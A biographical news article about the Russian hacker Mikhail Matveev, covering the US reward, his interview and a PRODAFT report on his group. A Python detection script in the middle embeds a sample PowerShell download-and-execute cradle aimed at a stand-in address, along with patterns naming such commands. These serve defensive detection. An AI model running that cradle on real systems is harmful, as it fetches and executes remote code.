
Matveev Mikhail Pavlovich


Biography

2023

US State Department announces a $10 million reward for his capture

On May 16, 2023, the US State Department announced a $10 million reward for information that would help capture the Russian hacker Mikhail Matveev.

According to US law enforcement, Matveev took part in transnational criminal activity. He had already been formally indicted on cyber-fraud charges in the District of Columbia and the District of New Jersey. At the same time, the Office of Foreign Assets Control (OFAC) of the US Treasury imposed sanctions on him.

"We are taking these measures in connection with Matveev's participation in ransomware attacks on US law enforcement agencies and businesses and on critical infrastructure facilities around the world," the State Department said in a statement.

US Treasury documents describe Matveev as a key figure in the development and distribution of ransomware such as Hive, LockBit and Babuk. In 2021, according to the department, Babuk ransomware was used to attack the police department of a large American city. The attackers stole home addresses, mobile phone numbers, financial details, medical histories and other personal data of police officers, as well as confidential information about criminal gangs, witnesses and suspects.

Law enforcement also links Matveev to the deployment of ransomware on the networks of a number of organizations, including a US airline. The Treasury adds that the Hive ransomware group has attacked more than 1,500 victims in more than 80 countries, including hospitals, educational institutions, financial firms and critical infrastructure. Nothing has been reported about Matveev's alleged whereabouts.[1]

Interview with journalists

In early October 2023, Mikhail Matveev, one of the most wanted Russian hackers, also known as Wazawaka and Boriselcin, spoke to reporters. He said that his life had not changed much after the United States added him to its sanctions list and offered a $10 million reward for information that would help capture him.

According to Matveev, being under US sanctions means that Russia will not extradite him; from this one can conclude that, as of October 2023, he lives in the Russian Federation. Matveev stressed that he would no longer travel and that, to remove any temptation, he had literally "burned his passport." His last trip abroad, he said, was to Thailand in 2014, where among other things he tried local dishes, in particular scorpions, which "turned out to be delicious."

"We Russians are not afraid of the American authorities. My life has changed for the better after the sanctions; I don't feel them myself, and they are a plus for my safety," Matveev said in an interview with TechCrunch.

According to US law enforcement, Matveev was involved in a "global extortion campaign" and worked closely with the Hive, LockBit and Babuk groups to carry out "serious attacks" on corporations and critical infrastructure in the US and other countries, including hospitals and government agencies. Matveev himself denies this, stating that he is not connected with any ransomware gang and that he "only rented their software for his own purposes."

"I have never been the author of the Hive and LockBit projects; I was only an affiliate, an independent person, my own boss," Matveev said, adding that he is no longer interested in ransomware.[2]

Swiss researchers study and publish detailed information on the activities of the well-known Russian hacker

PRODAFT has published a report on the activities of a group of Russian hackers led by Mikhail Matveev which, according to the company, develops and operates ransomware. Its analysts studied the group's activity from April to December 2023, drawing on intercepted messages between its members. According to the company, besides its leader the group includes six more "pentesters", who are named in the report only by their online handles. The group was allegedly not only an affiliate of ransomware platforms such as Conti, LockBit, Hive, Trigona and NoEscape, but also a direct developer of the Babuk and Monti RaaS platforms, together with Evgeny Bogachev.

[Figure: activity chart of Mikhail Matveev's group, from the PRODAFT report]

Matveev came to wide attention in May 2023, when the US Department of Justice issued a press release accusing him of attacking several US police departments with the LockBit and Babuk ransomware. A $10 million reward was announced for information about him, which PRODAFT may be hoping to claim by publishing its report.

According to the report, attacks orchestrated by Matveev and his team begin with reconnaissance: ZoomInfo and search services such as Censys, Shodan and FOFA are used to gather information about victims. Initial access comes from exploiting known vulnerabilities or from purchasing it from initial access brokers, after which a combination of custom and off-the-shelf tools is used to brute-force VPN credentials, elevate privileges and streamline operations.

[Figure: vulnerabilities Mikhail Matveev's group used to gain initial access to victims' infrastructure, from the PRODAFT report]

"After gaining initial access, Wazawaka (Matveev's alias) and his subordinates mainly use PowerShell commands to launch remote monitoring and management (RMM) tools," the PRODAFT report explains. "A distinctive feature of the team is its use of MeshCentral, an open-source tool, for various operations."
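The detection side of the technique described above, as an added example written for this page (it is not code from PRODAFT, from the report, or from the page): a small Python script that scans process-creation events for PowerShell launching an RMM agent, and for PowerShell command lines that hide a download cradle behind -EncodedCommand. The JSON event shape (loosely modelled on Sysmon process-creation fields), the three sample events, the documentation IP address and the agent binary name MeshAgent.exe are all constructed assumptions for the example, not observations from the report.

```python
"""Flag PowerShell-launched RMM agents and encoded/download-cradle PowerShell in process events.

The event shape is a constructed, loosely Sysmon-Event-ID-1-like JSON record, not real
telemetry. The RMM agent binary name MeshAgent.exe is an assumption for the example.
"""
import base64
import json
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumption: the MeshCentral agent runs as MeshAgent.exe; extend this set for other RMM tools.
RMM_AGENT_IMAGES = {"meshagent.exe"}

# PowerShell accepts any unambiguous prefix of a switch, so attackers write -e, -ec, -enc, ...
_ENC_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.I,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze(event: dict) -> list:
    """Return the names of the rules the event triggers (empty list if nothing fired)."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")

    # Rule 1: an RMM agent process whose parent is PowerShell.
    if image in RMM_AGENT_IMAGES and parent in POWERSHELL_IMAGES:
        findings.append("rmm_agent_spawned_by_powershell")

    # Rules 2-4: inspect PowerShell itself, looking through -EncodedCommand obfuscation.
    if image in POWERSHELL_IMAGES:
        decoded = decode_encoded_command(cmd)
        effective = decoded if decoded is not None else cmd
        if decoded is not None:
            findings.append("encoded_powershell")
        if DOWNLOAD_CRADLE.search(effective):
            findings.append("powershell_download_cradle")
        if any(agent.rsplit(".", 1)[0] in effective.lower() for agent in RMM_AGENT_IMAGES):
            findings.append("powershell_references_rmm_agent")
    return findings


def scan(log_text: str) -> dict:
    """Parse JSON-lines events; map each line number that fired to its findings."""
    results = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if line.strip():
            hits = analyze(json.loads(line))
            if hits:
                results[lineno] = hits
    return results


# Constructed sample events. 198.51.100.7 is a documentation address (RFC 5737), not a real host.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/meshagent.ps1')"
SAMPLE_EVENTS = [
    {"Image": _PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"', "User": "CORP\\analyst"},
    {"Image": _PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_command(_STAGER)}", "User": "CORP\\svc-backup"},
    {"Image": "C:\\Users\\Public\\MeshAgent.exe", "ParentImage": _PS,
     "CommandLine": "C:\\Users\\Public\\MeshAgent.exe", "User": "CORP\\svc-backup"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(hits)}")
```

The first sample event (an analyst listing a directory from Explorer) produces no findings; the second fires three rules because the encoded payload is decoded before the cradle and agent-name checks run; the third fires only the parent/child rule. Decoding the payload rather than matching on the raw command line matters because a plain string search for "meshagent" or "DownloadString" sees only base64 in the encoded case.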

Moreover, the source code of the Babuk ransomware developed by the team was leaked publicly, and other groups used it, among other things, to attack Russian critical information infrastructure facilities. Under US law, developing malware is still not itself punishable; only its use is prohibited. RaaS platforms exploit this to avoid prosecution, since their operators do not personally carry out the attacks. Russian law, by contrast, prohibits not only the use but also the development of malicious programs. In practice, however, prosecution requires an affected organization in Russia to file a complaint so that an investigation is opened, which is why Russian groups try not to extort domestic companies.

"In general, the idea that malware developers work exclusively from abroad is largely a myth," Pavel Kuznetsov, director of strategic alliances and government relations at the Garda group of companies, explained to TAdviser. "Malware developers who sold their work both to attackers from neighbouring countries and to domestic criminals for further use have often operated from the territory of the very state whose organizations were later attacked with those tools. It is enough to recall the story of the popular banking Trojans of the Dimnie family: according to many researchers, the Trojans of this family were developed by a person or group of people who were, if not living in Russia, then at least Russian-speaking."
